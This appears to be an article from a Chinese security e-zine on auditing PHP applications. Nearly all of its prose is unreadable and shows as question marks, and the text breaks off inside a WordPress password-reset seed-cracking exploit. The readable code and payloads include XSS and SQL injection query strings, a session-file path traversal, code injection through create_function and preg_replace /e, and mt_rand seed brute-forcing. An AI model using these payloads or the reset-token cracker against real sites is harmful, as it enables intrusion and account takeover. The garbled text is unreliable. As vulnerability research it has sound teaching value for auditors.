
                                       ==Ph4nt0m Security Team==
             
                                   Issue 0x03, Phile #0x06 of 0x07
             
            
            |=---------------------------------------------------------------------------=|
            |=---------------------=[ ???PHP??ó???????????? ]=---------------------=|
            |=---------------------------------------------------------------------------=|
            |=---------------------------------------------------------------------------=|
            |=----------------------=[    By www.80vul.com     ]=------------------------=|
            |=------------------------=[   <www.80vul.com>   ]=--------------------------=|
            |=---------------------------------------------------------------------------=|
            
            
            [??]
            
            1. ???
            2. ??????????????
            3. PHP?汾???????????
            4. ?????????????????????
            5. ???????????
              5.1 ?????????key
              5.2 ????????
                5.2.1 ?????????????
                5.2.2 parse_str()???????????
                5.2.3 import_request_variables()???????????
                5.2.4 PHP5 Globals 
              5.3 magic_quotes_gpc??????
                5.3.1 ????magic_quotes_gpc
                5.3.2 ??Щ?????????????????
                5.3.3 ??????????????
                5.3.4 ???ι???
                5.3.5 ?????????????μ???????
                5.3.6 ????key?????????
              5.4 ???????
                5.4.1 PHP?п?????′??????????
                5.4.2 ???????????????
              5.5 PHP???????????????
                5.5.1 PHP????????????
                5.5.2 PHP?????????????
                5.5.3 session_destroy()?????????
                5.5.4 ???????
              5.6 ???????
                5.6.1 ???
                  5.6.1.1 include???
                  5.6.1.2 ??????
                  5.6.1.3 ?????????????????
            6. ????????????μ????
            7. DEMO
            8. ??
            9. ???
            
            
            ??????
            
                PHP????????????????????????????web?????????п??????????????????
            ?????????????????г???34%???????php??????????Yahoo??sina??163??sohu?????
            ???????????????????web???????????bbs,blog,wiki,cms???????????php???????
            Discuz??phpwind??phpbb??vbb??wordpress??boblog????????web??????????????php?
            ?ó??????????????????????????????????????????????????????
            ?ó????????????????????????????????????ó??????????????????????????
            ??????????д????????????????????????????????????????????????????
            ?????????????棺???????????????????????Щ??????????????????????Щ
            ??????????????????????????????????????????????????n???????к?
            ?????????е???????е????????????????????????????????????????
            ?о??????????????????????μ????????μ???????????????????Щ?????????
            ???????????
            
                ??????????????????±????????????????????????????????????????????
            ?????????л?????????
            
            
            ??????????????????
            
                WEB??ó?????????????????Χ????????????????????????????????????????
            ????????????????????????????n?α??????????????????????????У??????
            MS??侭?????????????????????к????????仰?????????????????????????
            ?????????gpc[$_GET,$_POST,$_COOKIE]??????????????????????n???仯??????
            ??????????????????????????仰???????′??????????н?????????????к??????
            
                PHP??????????????????????????????????????????????????????????????
            ????????Σ??????????????grep??findstr?????????????????????????????????????
            ????Щ???????????о??Щ?????????????????????????????????????????????е?
            ??????????????????????????????????????Щ?????????????????
            
                ??????????У???????PHP????????????????????????hookΣ???????????????
            ??????????????????Щ??????????????????????
            
            
            ????PHP?汾???????????
            
                ????????PHP?????3???汾??php4??php5??php6???????????????£?
            
            php4 68% 
            2000-2007??No security fixes after 2008/08??????汾??php4.4.9
            
            php5 32% 
            2004-present??Now at version 5.2.6??PHP 5.3 alpha1 released!??
            
            php6 
            ??????????Σ??仯?????????????????????????????magic_quotes_gpc??
            ??????????????????Χ??
            
                ????php??????????????????????PHP?汾???棬????o??????????б??????
            ??Щ????????????????????WEB??ó??????????????????????????????????
            
            
            ????????????????????????
            
                ???????????????????????????????????????????塱???????????????????
            ?й?????????????????????PHP?汾????????????????в??????????????????????
            win/*nix????WEB???????????????iis/apache?????????????????????????????????
            ??WEB SERVER?????????????????????????Щ??????漰??
            
                ??????????????????WEB??????????????????????????????WEB??????????
            PHP?汾???????
            
            
            ?塢???????????
            
            ???潫????????Щ????PHP??????????Щ???????????ü??ɡ?
            
            5.1 ?????????key
            
                ????????????????????????GET/POST/COOKIE?????????????????????????е?
            ?????????????key?????????????????????
            
            --code-------------------------------------------------------------------------
            <?php
            // key.php demo: every query-string *key* is printed back unescaped.
            // A parameter name is as attacker-controlled as its value (the sample
            // request below puts a double quote inside a key), so a key that reaches
            // HTML, include() or SQL needs exactly the same escaping as a value.
            //key.php?aaaa"aaa=1&bb"b=2 
            //print_R($_GET); 
             foreach ($_GET AS $key => $value)
            {
            	print $key."\n";
            }
            ?>
            -------------------------------------------------------------------------------
            
                ??????????????????????key??????????????????????????????????URL??
            
            --code-------------------------------------------------------------------------
            key.php?<script>alert(1);</script>=1&bbb=2
            -------------------------------------------------------------------------------
            
                ???????????xss???????????????????key????include()?????????sql???
            ??????? 
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.2 ?????????variable-overwrite??
            
                ?????????????????extract()?????????????????EXTR_OVERWRITE????????
            ????????????±??????????????к????????????±?????????磺
            
            5.2.1 ?????????????
            
            ?????′???
            
            --code-------------------------------------------------------------------------
            <?php
            // var.php demo: variable-variable assignment ($$key) from $_GET lets any
            // request parameter overwrite a local that was already initialised; the
            // request below replaces $a, so "hi" is never printed.
            //var.php?a=fuck
            $a="hi";
            foreach($_GET as $key => $value) {
            	$$key = $value;
            }
            print $a;
            ?>
            -------------------------------------------------------------------------------
            
                ????WEB?????????????????????????????foreach??????Discuz!4.1??WAP????
            ?????
            
            --code-------------------------------------------------------------------------
            $chs = "";
            if($_POST && $charset != "utf-8") {
            	$chs = new Chinese("UTF-8", $charset);
            	foreach($_POST as $key => $value) {
            		$$key = $chs->Convert($value);
            	}
            	unset($chs);
            -------------------------------------------------------------------------------
            	
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.2.2 parse_str()?????????????CVE-2007-3205????mb_parse_str() 
            
            --code-------------------------------------------------------------------------
            //var.php?var=new
            // parse_str() called with a single argument registers every name in the
            // string as a variable in the current scope, so the query string below
            // overwrites $var before it is printed. Passing a second (array) argument
            // to parse_str(), or reading $_GET directly, avoids the overwrite.
            $var = "init";                     
            parse_str($_SERVER["QUERY_STRING"]); 
            print $var;
            -------------------------------------------------------------------------------
             
                ?ú???????????????????????????????????$_SERVER["QUERY_STRING"]???????
            ??????????????????????????????????=?????????????????????
            
            --code-------------------------------------------------------------------------
            //var.php?var=1&a[1]=var1%3d222
            // Same flaw one step removed: the string handed to parse_str() is taken
            // from $a[...], and $a is never assigned in this script (presumably it is
            // populated from the request via register_globals), so the caller chooses
            // both the index and the "name=value" text. $var1 is overwritten with 222.
            $var1 = "init";
            parse_str($a[$_GET["var"]]);
            print $var1;
            -------------------------------------------------------------------------------
            
            ?????????????$var??????$var1??????
            
            +++++++++++++++++++++++++
            ??????????parse_str??
            -------------------------
            PHP?汾?????
            ???????
            ??????????????parse_str
            +++++++++++++++++++++++++
            
            +++++++++++++++++++++++++
            ??????????mb_parse_str??
            -------------------------
            PHP?汾???php4<4.4.7 php5<5.2.2
            ???????
            ??????????????mb_parse_str
            +++++++++++++++++++++++++
            
            
            5.2.3 import_request_variables()?????????????CVE-2007-1396??
            
            --code-------------------------------------------------------------------------
            //var.php?_SERVER[REMOTE_ADDR]=10.1.1.1
            // import_request_variables("GPC") copies GET/POST/COOKIE names into the
            // global scope. In the affected versions (see the box below this listing,
            // CVE-2007-1396 in the heading) the request above overwrites
            // $_SERVER["REMOTE_ADDR"], so the IP check passes for any client.
            // NOTE(review): the "n" appended to the echo looks like a mangled "\n".
            echo "GLOBALS ".(int)ini_get("register_globals")."n";
            import_request_variables("GPC");
            if ($_SERVER["REMOTE_ADDR"] != "10.1.1.1") die("Go away!");
            echo "Hello admin!";
            -------------------------------------------------------------------------------
            
            +++++++++++++++++++++++++
            ??????????import_request_variables??
            -------------------------
            PHP?汾???php4<4.4.1 php5<5.2.2
            ???????
            ??????????????import_request_variables
            +++++++++++++++++++++++++
            
            
            5.2.4 PHP5 Globals 
            
                ???????????????????????????PHP?????????????????????????????
            
            --code-------------------------------------------------------------------------
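            <?php
            // register_globals =ON
            //foo.php?GLOBALS[foobar]=HELLO
            // With register_globals on, a request parameter named GLOBALS[...] is
            // treated as an entry of the global symbol table, so $foobar is already
            // defined here although this script never assigns it.
            // (The listing originally split the open tag into "<?" and "php echo",
            // which is a parse error; restored to a single "<?php" tag.)
            echo $foobar; 
            ?>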
            -------------------------------------------------------------------------------
            
                ????????????п????????????′???
            
            --code-------------------------------------------------------------------------
            //??????????????
            //var.php?GLOBALS[a]=aaaa&b=111
            // Attempted hardening: when register_globals is on, unset every variable
            // whose name appears as a request key. As the example implies, it does not
            // undo a GLOBALS[a]=... injection — the request key is "GLOBALS", not "a",
            // so $a is still set when printed. $_GET[b] uses an unquoted constant name.
            if (ini_get("register_globals")) foreach($_REQUEST as $k=>$v) unset(${$k});
            print $a;
            print $_GET[b];
            -------------------------------------------------------------------------------
            
                ??????WEB2.0????????????????????????????????????????????????crsf
            ??????
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.3 magic_quotes_gpc??????
             
            5.3.1 ????magic_quotes_gpc
             
                ??????????е? "???????????"??????????\????б????? NULL ?????????????????
            ??б???????塣???к??????????????? ?磺addslashes()??mysql_escape_string()??
            mysql_real_escape_string()?????????parse_str()?????????magic_quotes_gpc???
            ??????????????????????????????????????????????????Щ?????????
            ???????????????????????????????????????Щ??????????????????????????
            ??????????????????????????????????? ????
             
            5.3.2 ??Щ?????????????????
                
            1) $_SERVER???? 
            
                PHP5??$_SERVER???????magic_quotes_gpc????????????????X-Forwarded-For?????
            ??????????????????????X-Forwarded-For??????????????????
            
            +++++++++++++++++++++++++
            ??????????$_SERVER??????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????_SERVER
            +++++++++++++++++++++++++
            
            
            2) getenv()?????????????????$_SERVER??????
               
            +++++++++++++++++++++++++
            ??????????getenv()??
            -------------------------
            PHP?汾?????
            ???????
            ??????????????getenv
            +++++++++++++++++++++++++
            
            
            3) $HTTP_RAW_POST_DATA??PHP?????????
            
                ????????soap/xmlrpc/webpublish???????????′???
            
            --code-------------------------------------------------------------------------
            // The raw request body is read straight from php://input. This listing sits
            // in the section on inputs magic_quotes_gpc does not cover: neither
            // $HTTP_RAW_POST_DATA nor php://input is escaped, so code that relies on
            // magic quotes receives this data exactly as sent.
            if ( !isset( $HTTP_RAW_POST_DATA ) ) {
            	$HTTP_RAW_POST_DATA = file_get_contents( "php://input" );
            }
            if ( isset($HTTP_RAW_POST_DATA) )
            	$HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);
            -------------------------------------------------------------------------------
            	        
            +++++++++++++++++++++++++
            ??????????????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????HTTP_RAW_POST_DATA????php://input
            +++++++++++++++++++++++++
            
            
            4) ????????????????"?????磺in()/limit/order by/group by
                 
                ??Discuz!<5.0??pm.php??
                 
            --code-------------------------------------------------------------------------
            if(is_array($msgtobuddys)) {
            	$msgto = array_merge($msgtobuddys, array($msgtoid));
            		......
            foreach($msgto as $uid) {
            	$uids .= $comma.$uid;
            	$comma = ",";
            }
            ......
            $query = $db->query("SELECT m.username, mf.ignorepm FROM {$tablepre}members m
            	LEFT JOIN {$tablepre}memberfields mf USING(uid)
            	WHERE m.uid IN ($uids)");
            -------------------------------------------------------------------------------
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ????????????????????????select,update,insert????
            +++++++++++++++++++++++++
            
            
            5.3.3 ??????????????
            
                ???WEB???????????????????????????????????????????????????
            ????????????????????????
            
                ????????????????У?
            
            1) stripslashes() ?????????????decode-addslashes()
            
            2) ??????????????????
            
            base64_decode -- ????? MIME base64 ???????????н???
            base64_encode -- ??? MIME base64 ????????б???
            rawurldecode -- ???????? URL ????????н???
            rawurlencode -- ???? RFC 1738 ?? URL ???б???
            urldecode -- ?????????? URL ?????
            urlencode -- ???? URL ?????
             ......
            ????????? unserialize/serialize??
            
            3) ???????????GKB,UTF7/8...????iconv()/mb_convert_encoding()??
                  
                ??????????????????????????????????????urldecode??
            
            --code-------------------------------------------------------------------------
            // Decoding after escaping: PHP already URL-decoded the query string once
            // (id=%2527 arrives as %27), magic_quotes_gpc sees no quote character and
            // leaves it alone, then urldecode() turns %27 into a bare quote inside the
            // SQL string. Any decode/convert step applied after escaping undoes it.
            // NOTE(review): the quoting in this listing looks mangled by re-encoding;
            // the original most likely wrapped the value in single quotes.
            $sql = "SELECT * FROM article WHERE articleid="".urldecode($_GET[id]).""";
            -------------------------------------------------------------------------------
            
                ??magic_quotes_gpc=on??????????id=%2527?????sql??????
            
            --code-------------------------------------------------------------------------
            SELECT * FROM article WHERE articleid="""
            -------------------------------------------------------------------------------
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ????????????????????
            +++++++++++++++++++++++++
            
            
            5.3.4 ???ι?????????????[1]??
            
            1) ???????????????н??й???
            
            2) ?????????????
            
              * mysql/oracle???????????\????????"??????????仯?\"????????update??????
            ??????????????"??
            
              * mssql?????????"????????????"??????????仯?\"??mssql??????????????
            ???????????????????????mssql?????????κ????壩
                
                ?????????????????????????????н???????????????к??????????????ι???
            ?????????????webrootkit??????????????????????????????????????????
            ???????vul??
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.3.5 ?????????????μ???????
            
                ??????????????????????????
            
            [\-->\\, '-->\', "-->\", null-->\0]
            
                ????????????????????????????\??????\??????????????????????WIN???????
            ???????????????????????php??ó???????????????????????
            
            1) ?????????",\,",null]??
            
            --code-------------------------------------------------------------------------
            $order_sn=substr($_GET["order_sn"], 1);
            
            //??                 "
            //??????????         \"
            //substr               "
            // The three comment lines above trace one quote character: the request
            // sends it, magic_quotes_gpc prefixes a backslash, and substr(..., 1)
            // then drops that backslash, so the quote reaches the query unescaped.
            // NOTE(review): quote characters in this listing appear mangled by
            // re-encoding; the original likely used single quotes around $order_sn.
            
            $sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
               " shipping_time, shipping_id, invoice_no, user_id ".
               " FROM " . $ecs->table("order_info").
               " WHERE order_sn = "$order_sn" LIMIT 1";
            -------------------------------------------------------------------------------
            
            2) ?????\?????
            
            --code-------------------------------------------------------------------------
            $order_sn=substr($_GET["order_sn"], 0,1);
            
            //??                 "
            //??????????         \"
            //substr               \    
            // Mirror case: substr(..., 0, 1) keeps only the backslash that
            // magic_quotes_gpc added. That lone backslash escapes the quote which was
            // meant to close the order_sn literal, so the literal runs on into the
            // next interpolated value ($_GET["order_tn"]); the request and resulting
            // SQL shown below this listing illustrate it. Parameterised queries do not
            // depend on this escaping at all.
            // NOTE(review): quote characters in this listing appear mangled by
            // re-encoding; the original likely used single quotes.
            
            $sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
               " shipping_time, shipping_id, invoice_no, user_id ".
               " FROM " . $ecs->table("order_info").
               " WHERE order_sn = "$order_sn" and order_tn="".$_GET["order_tn"].""";
            -------------------------------------------------------------------------------
               
                ???????
            
            --code-------------------------------------------------------------------------
            ?order_sn="&order_tn=%20and%201=1/* 
            -------------------------------------------------------------------------------
            
                ??е?SQL??????
            
            --code-------------------------------------------------------------------------
            SELECT order_id, order_status, shipping_status, pay_status, shipping_time, 
            shipping_id, invoice_no, user_id FROM order_info WHERE order_sn = "\" and 
            order_tn=" and 1=1/*"
            -------------------------------------------------------------------------------
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ?????????????????????????substr???????????
            +++++++++++++++++++++++++
            
            
            5.3.6 ????key?????????
                
                ?????????????????????????key??PHP??????????????????????
            
            --code-------------------------------------------------------------------------
            <?php
            // Same key.php demo as in 5.1, reused here to show how magic_quotes_gpc
            // treats *keys*: the outputs listed after this block differ by PHP version
            // and by the magic_quotes_gpc setting.
            //key.php?aaaa"aaa=1&bb"b=2 
            //print_R($_GET); 
             foreach ($_GET AS $key => $value)
                    {
                    print $key."\n";
                    }
            ?>
            -------------------------------------------------------------------------------
            
            1) ??magic_quotes_gpc = On?????php5.24?2????????
              
            aaaa\"aaa
            bb\"b
            
                ???????????????????????????magic_quotes_gpc = On?£?????key????????????
            ??????php4??php<5.2.1??汾?У????????????????????key????????????£?
            
            --code-------------------------------------------------------------------------
            <?php
            // Nested key demo: in php4 / php<5.2.1 (per the box below) only the inner
            // key gets escaped by magic_quotes_gpc — the printed array shows
            // [aaaa"aaa] unescaped but [bb\"] escaped.
            //key.php?aaaa"aaa[bb"]=1 
            print_R($_GET); 
            ?>
            -------------------------------------------------------------------------------
            
                ??????:
            
            Array ( [aaaa"aaa] => Array ( [bb\"] => 1 ) )   
            
                ?????????????key???????????????
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾???php4??php<5.2.1
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            2) ??magic_quotes_gpc = Off?????php5.24?2????????
            
            aaaa"aaa
            bb"b
            
                ????magic_quotes_gpc = Off????е??????????????????????????????????
            addslashes?????????????????????????????????????£?
            
            --code-------------------------------------------------------------------------
            <?php 
            // keyvul.php demo: a common "emulate magic quotes when they are off"
            // wrapper. addslashes_array() recurses over the array *values* only, so
            // the keys are never escaped; the output below this listing shows the
            // value as 1\" but the key still as aaa"aa.
            //keyvul.php?aaa"aa=1"
            //magic_quotes_gpc = Off
             if (!get_magic_quotes_gpc())
            {
             $_GET  = addslashes_array($_GET);
            }
            
            // Escapes every leaf value of a (possibly nested) array with addslashes().
            // Keys are passed through untouched by array_map().
            function addslashes_array($value)
            {
                    return is_array($value) ? array_map("addslashes_array", $value) : addslashes($value);
            }
            print_R($_GET);
            foreach ($_GET AS $key => $value)
            {
            	print $key;
            }
            ?>
            -------------------------------------------------------------------------------
            
                ??????????????????????????????????addslashes($value)???????????????
            ???????????д???????????key???????????????????£?
              
            Array
            (
                [aaa"aa] => 1\"
            )
            aaa"aa
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾????? 
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.4 ???????
            
            5.4.1 PHP?п?????′??????????
            
                ?????????eval??preg_replace+/e??????д???????????php???к????????
            ????д????磺
            
            assert()
            call_user_func()
            call_user_func_array()
            create_function()
            ????????
            ...
            
                ??????????????????????????create_function()???????????????
            
            --code-------------------------------------------------------------------------
            <?php
            // create_function() demo: $sort_by comes straight from the request and is
            // concatenated into the *source text* of the comparator, so the request
            // controls the code that create_function() compiles — the same class of
            // issue as eval(). The "how to exp" comment is the author's; a fix is to
            // whitelist $sort_by against the known column names before use.
            // NOTE(review): the quoting inside $sort_function looks mangled by
            // re-encoding (the original likely used single quotes around the index).
            //how to exp this code
            $sort_by=$_GET["sort_by"];
            $sorter="strnatcasecmp";
            $databases=array("test","test");
            $sort_function = "  return 1 * " . $sorter . "($a["" . $sort_by . ""], $b["" . $sort_by . ""]);
            	      ";
            usort($databases, create_function("$a, $b", $sort_function));
            -------------------------------------------------------------------------------
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ???????????????????assert,call_user_func,call_user_func_array,create_function???
            +++++++++++++++++++++++++
            
            
            5.4.2 ???????????????
                 
                ?????????????????????????????????????????
            
            --code-------------------------------------------------------------------------
            // NOTE(review): both lines read identically here, which makes no sense for
            // a contrast; the listing most likely showed single-quoted versus
            // double-quoted strings (only the double-quoted form interpolates $a and
            // the escape), with the single quotes lost in re-encoding.
            echo "$a\n";
            echo "$a\n";
            -------------------------------------------------------------------------------
            
                ??????????′???
            
            --code-------------------------------------------------------------------------
            //how to exp this code
            if($globals["bbc_email"]){
            
            $text = preg_replace(
            		array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
            				"/\[email\](.*?)\[\/email\]/ies"),
            		array("check_email("$1", "$2")",
            				"check_email("$1", "$1")"), $text);
            -------------------------------------------------------------------------------
            						
                ?????????ó??????????""???????????????config????data???????????
            ???????????????????
               
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ??????????????
            +++++++++++++++++++++++++
            
            
            5.5 PHP???????????????
                 
            5.5.1 PHP????????????
            
                ???????Stefan Esser?????Month of PHP Bugs??MOPB?????[2]???????????б??
            ???????????unserialize()?????????£?
            
            --code-------------------------------------------------------------------------
            // Cookie content is handed to unserialize() after stripslashes(). The text
            // around this listing ties it to the unserialize() bugs catalogued in the
            // Month of PHP Bugs; independent of PHP version, deserialising data the
            // client controls is unsafe — json_decode() is the usual replacement.
            unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . "_data"]);
            -------------------------------------------------------------------------------
            
                ????????PHP?汾?????????????????????????????????????????ó????????
            ????????????????????PHP?汾?????
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾??????fix??汾
            ?????
            ???????????????????
            +++++++++++++++++++++++++
            
            
            5.5.2 PHP?????????????
            
                Stefan Esser?????????????unset()--Zend_Hash_Del_Key_Or_Index Vulnerability
                
                ????phpwind?????serarch.php??????
            
            --code-------------------------------------------------------------------------
            unset($uids);
            ......
            $query=$db->query("SELECT uid FROM pw_members WHERE username LIKE "$pwuser"");
            while($member=$db->fetch_array($query)){
            	$uids .= $member["uid"].",";
            }
            $uids ? $uids=substr($uids,0,-1) : $sqlwhere.=" AND 0 ";
            ........
            $query = $db->query("SELECT DISTINCT t.tid FROM $sqltable WHERE $sqlwhere $orderby $limit");
            -------------------------------------------------------------------------------
                
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾???php4<4.3 php5<5.14
            ???????
            ???????????unset
            +++++++++++++++++++++++++
            
            
            5.5.3 session_destroy()???????????????PHP?汾??5.1.2??
                
                ????????????????saiy??????session_destroy()??????????????session?????
            ???web??ó????logout??????????????????????session????????????????Щ??
            ??汾????????????????????????????????????£?
            
            --code-------------------------------------------------------------------------
            <?php 
            // val.php demo for session_destroy() in PHP < 5.1.2 (see heading). The
            // session id comes from the client cookie; the file handler builds the
            // session file path from it, and the paragraph below shows that a
            // PHPSESSID containing "../" makes session_destroy() unlink a file outside
            // the save path. Validating the id (e.g. against [A-Za-z0-9,-]) before
            // session_start() closes this regardless of version.
            //val.php   
            session_save_path("./");
            session_start();
            if($_GET["del"]) {
            	session_unset();
            	session_destroy();
            }else{
            	$_SESSION["hei"]=1;
            	echo(session_id());
            	print_r($_SESSION);
            }
            ?>
            -------------------------------------------------------------------------------
            
                ????????????cookie:PHPSESSID=/../1.php??????unlink("sess_/../1.php")????
            ????????../???????????????????????????????Щ?汾?????????phpmyadmin??
            sablog??phpwind3????
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾??????岻??
            ???????
            ???????????session_destroy
            +++++++++++++++++++++++++
            
            
            5.5.4 ???????
                
            1) rand() VS mt_rand()
            
            --code-------------------------------------------------------------------------
            <?php
            // On Windows rand() tops out at 32767 while mt_rand() reaches 2^31-1, as
            // the two prints show; a rand()-derived token therefore has at most 15
            // bits of entropy.
            //on windows
            print mt_getrandmax(); //2147483647
            print getrandmax();// 32767
            ?>
            -------------------------------------------------------------------------------
            
                ???????rand()???????????32767?????????????????????? 
            
            --code-------------------------------------------------------------------------
            <?php
            // Illustrates the consequence: md5(rand()) has only 32768 possible values
            // on that platform, so the loop recovers the original number by trying
            // each one. Tokens and session ids must come from a CSPRNG
            // (random_bytes()/random_int() in current PHP), not rand() or mt_rand().
            // Note the loose == comparison between two strings.
            $a= md5(rand());
            for($i=0;$i<=32767;$i++){
              if(md5($i) ==$a ) {
               print $i."-->ok!!<br>";exit;
               }else { print $i."<br>";}
            }
            ?>
            -------------------------------------------------------------------------------
            
                ?????????????rand????session????????????????????????session?????????
            mt_rand????????????????
            
            +++++++++++++++++++++++++
            ?????????
            -------------------------
            PHP?汾?????
            ???????
            ???????????rand
            +++++++++++++++++++++++++
            
            
            2) mt_srand()/srand()-weak seeding??by Stefan Esser??
                
                ??php????????????
            
            -------------------------------------------------------------------------------
            mt_srand
            (PHP 3 >= 3.0.6, PHP 4, PHP 5)
            
            mt_srand -- ???????????????????????????
            ???
            void mt_srand ( int seed )
            
            
            ?? seed ?????????????????????? PHP 4.2.0 ?濪???seed ?????????????????????
            ??????????????? 
            
            ???? 1. mt_srand() ????
            
            <?php
            // seed with microseconds
            // (Manual example.) The seed is derived from the wall clock alone, so it
            // is predictable to anyone who can estimate when the request ran; the
            // text after this excerpt explains why this seeding is weak.
            function make_seed()
            {
                list($usec, $sec) = explode(" ", microtime());
                return (float) $sec + ((float) $usec * 100000);
            }
            mt_srand(make_seed());
            $randval = mt_rand();
            ?>  
             
            ?: ?? PHP 4.2.0 ??????????? srand() ?? mt_srand() ??????????????????????????
            ?????ɡ?
            -------------------------------------------------------------------------------
            
                php??4.2.0????????????????????????????????????????????????????
            
            --code-------------------------------------------------------------------------
            mt_srand ((double) microtime() * 1000000)
            -------------------------------------------------------------------------------
            
                ???????(double)microtime()*1000000????????seed??????????
            
            0<(double) microtime()<1 ---> 0<(double) microtime()* 1000000<1000000
            
                ???????????????,??????????£?
            
            --code-------------------------------------------------------------------------
            <?php
            /////////////////
            //>php rand.php
            //828682
            //828682
            ////////////////
            // Lift the script time limit: the seed search below may try up to a million seeds.
            ini_set("max_execution_time",0);
            // microtime() (without get_as_float) yields "usec sec"; casting that string to
            // double keeps only the leading fraction, so 0 <= $time < 1000000 — a seed space
            // of roughly one million values instead of 2^32.
            $time=(double) microtime()* 1000000;
            print $time."\n";
            mt_srand ($time);
            
            // Take a single output of the seeded generator and recover the seed from it.
            $search_id = mt_rand();
            $seed = search_seed($search_id);
            print $seed;
            function search_seed($rand_num) {
            // Recovers the seed behind one mt_rand() output by re-seeding with every candidate
            // in 0..1000000 (the whole range a (double)microtime()*1000000 seed can take) and
            // comparing the first draw. Returns the matching seed, or false if none matches.
            // Cost is linear in $max, which is why a clock-derived seed gives no real secrecy.
            $max = 1000000;
            for($seed=0;$seed<=$max;$seed++){
            	mt_srand($seed);
            	$key = mt_rand();
            	if($key==$rand_num) return $seed;
            }
            return false;
            }
            ?>
            -------------------------------------------------------------------------------
            
                ????????????????seed????????????Stefan Esser?????seed?????????仯
            ???仯?????仰??????????????seed???????? ???????seed???mt_rand???????
            ?????????????
            
            +--------------+
            |   seed-A     |
            +--------------+
            | mt_rand-A-1  |
            | mt_rand-A-2  |
            | mt_rand-A-3  |
            +--------------+
            
            +--------------+
            |   seed-B     |
            +--------------+
            | mt_rand-B-1  |
            | mt_rand-B-2  |
            | mt_rand-B-3  |
            +--------------+
            
                ????seed-A??mt_rand-1/2/3?????????????????????????????????seed-A????
            seed-B?????mt_rand-A-1?????mt_rand-B-1????????????????????seed??????????
            mt_rand??????
            
                ????5.2.6>php>4.2.0??????????????????????????????????????????
            ?????????????????????????????????????
            
            ??????"Cross Application Attacks"??????·??Stefan Esser?????????????????????
            ?????????????????mt_srand ((double) microtime()* 1000000)????phpbb+wordpree??
            ????????????Σ??.
            
            ??????5.2.6>php>4.2.0????????????????????????Stefan Esser???????????????
            
            -------------------------------------------------------------------------------
            The Implementation
            When mt_rand() is seeded internally or by a call to mt_srand() PHP 4 and PHP 5 
            <= 5.2.0 force the lowest bit to 1. Therefore the strength of the seed is only
            31 and not 32 bits. In PHP 5.2.1 and above the implementation of the Mersenne 
            Twister was changed and the forced bit removed.
            -------------------------------------------------------------------------------
            
                ??32λ???????????????????????2^32????????????????2^32?ξ???????
            seed??????PHP 4??PHP 5 <= 5.2.0 ?????и?bug??????????????????????????????
            [3]??,??????????£?
            
            --code-------------------------------------------------------------------------
            <?php
            // Two seeds that differ only in the lowest bit. On PHP 4 and PHP 5 <= 5.2.0 the
            // seeding code forces that bit to 1 (bug #40114, quoted above), so 4 and 5 collapse
            // to the same internal seed and $a == $b; from 5.2.1 on they differ.
            mt_srand(4); 
            $a = mt_rand(); 
            mt_srand(5); 
            $b = mt_rand();
            print $a."\n".$b;
            ?>
            -------------------------------------------------------------------------------
            
                ?????????????$a==$b???????????????????2^32/2=2^31?Ρ?????????′???
            
            --code-------------------------------------------------------------------------
            <?php
            //base on http://www.milw0rm.com/exploits/6421 
            //test on php 5.2.0
            
            define("BUGGY", 1); // 1 for PHP 4 / PHP <= 5.2.0 (the $a==$b case above: low seed bit forced to 1), 0 otherwise
            
            // Generate a 20-character key the way the application would, then recover the
            // mt_srand() seed that produced it.
            $key = wp_generate_password(20, false);
            echo $key."\n";
            $seed = getseed($key);
            print $seed."\n"; 
            
            // Re-seed with the recovered value and print what the generator hands out next:
            // once the seed is known, every further "random" value is reproducible.
            mt_srand($seed);
            $pass = wp_generate_password(20, false);
            echo $pass."\n";	
            	
            function wp_generate_password($length = 12, $special_chars = true) {
            	// Alphabet: alphanumerics, optionally extended with punctuation.
            	$alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
            	if ( $special_chars ) {
            		$alphabet .= '!@#$%^&*()';
            	}
            	$last = strlen($alphabet) - 1;
            
            	// One mt_rand() draw per character. mt_rand() is a seeded PRNG, so the whole
            	// password is determined by the seed — which is what the seed search exploits.
            	$password = '';
            	while ( strlen($password) < $length ) {
            		$password .= $alphabet[mt_rand(0, $last)];
            	}
            	return $password;
            } 
            
            function getseed($resetkey) {
            	// Exhaustive seed search: re-seed with each candidate, regenerate a 20-char key
            	// exactly as wp_generate_password() does and stop at the first match. Returns
            	// the seed, or false when the range is exhausted. With BUGGY set only odd seeds
            	// (2x+1) are tried, because the forced low bit halves the effective space to 2^31.
            	$max = pow(2,(32-BUGGY));
            	for($x=0;$x<=$max;$x++) {
            		$seed = BUGGY ? ($x << 1) + 1 : $x; 
            		mt_srand($seed);
            		$testkey = wp_generate_password(20,false);
            		if($testkey==$resetkey) { echo "o\n"; return $seed; }
            
            		// Progress indicator: prints a counter every 10000 candidates.
            		if(!($x % 10000)) echo $x / 10000;
            	}
            	echo "\n";
